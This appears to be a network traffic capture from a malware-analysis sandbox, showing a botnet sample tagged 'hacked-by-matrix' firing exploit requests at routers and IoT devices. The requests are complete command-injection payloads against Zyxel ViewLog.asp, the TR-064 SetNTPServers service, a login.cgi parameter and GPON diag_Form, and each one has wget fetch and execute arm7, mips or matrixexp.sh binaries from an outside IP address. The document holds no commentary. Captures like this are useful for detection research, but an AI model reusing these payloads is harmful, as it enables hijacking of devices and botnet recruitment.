                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:29.550441980 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:29.705893993 CET372INHTTP/1.1 503 Service Temporarily Unavailable
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 190
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>503 Service Temporarily Unavailable</title></head><body><center><h1>503 Service Temporarily Unavailable</h1></center><hr><center>nginx</center></body></html>
                                                        Mar 21, 2024 05:22:29.705929995 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        470192.168.2.134522478.185.167.647547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.050219059 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:29.796936989 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:30.035510063 CET197INHTTP/1.1 404 Not Found
                                                        Date: Thu Mar 21 07:22:29 2024
                                                        Server: tr069 http server
                                                        Content-Length: 15
                                                        Connection: close
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: File not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        471192.168.2.1338386206.12.96.20980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.060375929 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:29.230501890 CET1149INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 21 Mar 2024 04:22:29 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Location: https://206-12-96-209.cloud.computecanada.cacgi-bin/ViewLog.asp
                                                        Content-Length: 346
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 32 30 36 2d 31 32 2d 39 36 2d 32 30 39 2e 63 6c 6f 75 64 2e 63 6f 6d 70 75 74 65 63 61 6e 61 64 61 2e 63 61 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 32 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 61 69 6b 75 6e 74 68 61 2e 61 72 62 75 74 75 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://206-12-96-209.cloud.computecanada.cacgi-bin/ViewLog.asp">here</a>.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:22:29 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 309Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at vaikuntha.arbutus Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        472192.168.2.133622099.243.225.597547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.106611967 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:29.967312098 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        473192.168.2.1358818212.129.10.25280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.153707981 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:29.319433928 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.25.2
                                                        Date: Thu, 21 Mar 2024 04:22:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        474192.168.2.134525878.185.167.647547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.179945946 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:30.412262917 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        475192.168.2.136065041.239.119.397547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.385997057 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        476192.168.2.133756080.147.204.24180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.421156883 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:29.603918076 CET805INHTTP/1.1 403 Forbidden
                                                        Date: Thu, 21 Mar 2024 04:22:29 GMT
                                                        Server: Apache
                                                        Content-Length: 199
                                                        Keep-Alive: timeout=15, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 32 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:22:29 GMTServer: ApacheContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        477192.168.2.1355638212.181.241.115443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.540537119 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        478192.168.2.135722842.119.245.75443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:29.540550947 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


